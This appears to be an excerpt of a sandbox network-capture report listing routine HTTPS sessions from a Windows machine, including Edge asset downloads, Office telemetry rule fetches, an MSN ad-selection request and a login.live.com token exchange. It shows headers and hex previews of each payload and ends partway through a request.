                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC1154INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        83192.168.2.54987213.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:45 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                        x-ms-request-id: 7511d71d-801e-0083-6e8c-3af0ae000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234945Z-1777c6cb754n67brhC1TEBcp9c0000000a9g00000000q859
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        84192.168.2.54987113.107.246.404437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC431OUTGET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1
                                                                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:45 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 1468
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DBDCB5E23DFC43
                                                                                                                                                                                                                                                        x-ms-request-id: 505f89b8-401e-0024-6999-3bf149000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234945Z-1777c6cb754rz2pghC1TEBghen0000000a9g000000001cgm
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC1468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        85192.168.2.54987313.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:46 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 448
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                        x-ms-request-id: 71c2edc3-001e-0082-0fa6-3b5880000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234946Z-r1d97b99577lxltfhC1TEByw2s00000009m000000000dnbd
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        86192.168.2.54987413.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:46 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 491
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                        x-ms-request-id: e456cfdf-c01e-0014-248c-3aa6a3000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234946Z-1777c6cb754wcxkwhC1TEB3c6w0000000a3g00000000xrkq
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        87192.168.2.54987513.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:46 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                        x-ms-request-id: 5b8b83f7-201e-0033-0b8c-3ab167000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234946Z-1777c6cb7549x5qchC1TEBggbg0000000a8000000000xeta
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        88192.168.2.54987623.96.180.1894437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC1017OUTGET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=02AF36CE75CE647F00F523F374AC6592&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=4b2ab08e59af414bcdab22dfa67240ef HTTP/1.1
                                                                                                                                                                                                                                                        Host: arc.msn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=02AF36CE75CE647F00F523F374AC6592; _EDGE_S=F=1&SID=14C32D7CE61E6B5920983841E71A6A76; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC777INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Length: 2725
                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                        ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"1,P425132707-T700343875-C128000000002113389+B+P60+S1"},{"BATCH_REDIRECT_STORE":"B128000000002113389+P0+S0"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}]
                                                                                                                                                                                                                                                        Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:46 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC2725INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 48 6f 74 73 70 6f 74 73 5c 22 2c 5c 22 75 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 73 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 74 69 74 6c 65 5c 22 3a 5c 22 54 72 6f 6d 73 c3 b8 2c 20 4e 6f 72 77 61 79 5c 22 2c 5c 22 63 74 61 5c 22 3a 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 5c 2f 73 65 61 72 63 68 3f 71 3d 61 75 72 6f 72 61 2b 62 6f 72 65 61 6c 69 73
                                                                                                                                                                                                                                                        Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"MSNAnaheimNewsNTPImageHotspots\",\"u\":\"MSNAnaheimNewsNTPImages\"}],\"ad\":{\"title\":\"Troms, Norway\",\"cta\":\"https:\/\/www.bing.com\/search?q=aurora+borealis


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        89192.168.2.54987740.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 3592
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:46 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC653INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:48:46 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30405.9
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C515_BL2
                                                                                                                                                                                                                                                        x-ms-request-id: 0de01ba3-663f-46ba-a56b-52d6fcacf2b2
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: BL02EPF0001D7AF V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:46 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 11389
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        90192.168.2.54988023.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC634OUTGET /tenant/amp/entityid/BB1msOP1.img HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
